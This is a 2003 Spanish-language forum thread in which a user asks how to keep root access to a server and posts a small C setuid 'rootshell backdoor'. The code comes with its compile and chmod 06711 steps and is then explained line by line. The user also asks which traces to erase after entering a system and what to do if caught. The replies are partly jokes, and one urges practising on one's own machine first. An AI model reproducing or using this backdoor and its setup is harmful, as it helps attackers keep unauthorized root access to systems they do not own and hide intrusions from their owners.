PDA

Ver la versión completa : Abrir una puerta trasera en un sistema Linux?



windows
23-06-2003, 19:25
Como podria hacer para asegurarme de poder volver a entrar a un server donde
tengo un usuario como root, por si me llegan a borrar dicho user ?





Otra pregunta... que hace este programita ?


/* This is my First attempt at coding a rootshell backdoor.
This file is really simple. It allows a user to become
root by running this file.

As root, type gcc -o door door.c
then chmod 06711 door
type exit, and dot slash door

EPiC [H3C]

*/


#include <stdio.h>
int main(void) {
setuid(0);
setgid(0);
execl("/bin/bash", "-bash", NULL);
return 0;
}


Gracias!

<PICCOLO>
23-06-2003, 19:52
segun dicen sus comentarios es un backdoor de la sesión de root, en teoría lo que estás buscando, las lineas donde pone setuid(0) y setgid(0) en teoría cambian el usuario con el que ejecutes el programa a root( uidroot=0) y el grupo a root.
la siguiente linea no la entiendo, no estoy acostumbrado a programar en c bajo linux

-salu2-

Raistlin
24-06-2003, 13:08
Es un backdoor.

Te explico:

/* This is my First attempt at coding a rootshell backdoor.
This file is really simple. It allows a user to become root by running this file. <<<<<<< Primero tienes q conseguir ser root

As root, type gcc -o door door.c <<< Cuando seas root, compilas el archivo (este)
then chmod 06711 door <<< Esto, si no me equivoco, pone el bit SUID al ejecutable, para que SIEMPRE se ejecute como el usario que es su propietario (usease, root) esto es MUY importante, ya que si no la llamadas setuid(0) (que te convierte en root) no funciona
type exit, and dot slash door << Y esto cierra la sesion root y te la abres otra vez, pero con la back door (para comprobar y tal)

EPiC [H3C]

*/


#include <stdio.h>
int main(void) {
setuid(0); << Te convierte en root (si no tiene puesto el bit SUID, no hay nada q hacer
setgid(0); << Te pone en el grupo del root (igual que antes, sin SUID, al carajo)
execl("/bin/bash", "-bash", NULL); << Esto ejecuta un shell del sistema, es decir, te mantiene como root xDD
return 0;
}



Un consejo, buscate un diccionario y traduce antes de preguntar.

eXcalibur
24-06-2003, 13:10
Raistlin, Flint, Caramon...
¿La guerra de la lanza?

Raistlin
24-06-2003, 13:13
xDDDD


Prefiero las Cronicas de la DragonLance

windows
24-06-2003, 19:21
y cuales serian las huellas a borrar luego de haber entrado a un sistema ?

y que hacer en caso de que nos encuentren ?

se agradecen respuestas serias, muchas gracias!

TseTse
24-06-2003, 19:31
Esa pregunta es muy general, depende de muchos factores como servicios que ejecutes, que se está auditando, firewalls, etc. Depende de lo que hagas y como lo hagas.

Y si te pillan reza y hazte el loco.

TseTse

twilight
24-06-2003, 19:32
Depende de lo que hayas hecho en el sistema si te pillan tendras que hacer una cosa u otra...xDDDD aunque me ria esta es una respuesta muy seria (tan seria como tu nick...xDDD)

Raistlin
24-06-2003, 23:09
Yo que tu windows, no me meteria a trastear ningun ordenador remoto por ahora. Y ni mucho menos ponerme a conseguir roots sin saber que es un sistema unix.
Consigue antes una cuenta (shell) unix remota en cualquier servidor (se que hay algunos que las ofrecen y gratuitas) y practica con los comandos. No me gustaria oir por las noticias "COGIDO INFRAGANTI PELIGROSISIMO HACKER MIENTRAS HACIA DE LAS SUYAS EN LOS ORDENADORES DE ESTA REDACCION ... (cualquier periodico)" Y lo unico q hacias es no saber que coño estabas haciendo (perdon por la expresion).
Practica antes, y si puedes tener linux para ello, mejor.
Saludos.

TseTse
25-06-2003, 01:38
Una cosa hay que dejar clara, se dejan muchos más rastros en un sistema *nix que en un sistema windows (por norma general). Hay que tener mucho cuidadito con los *nix.

TseTse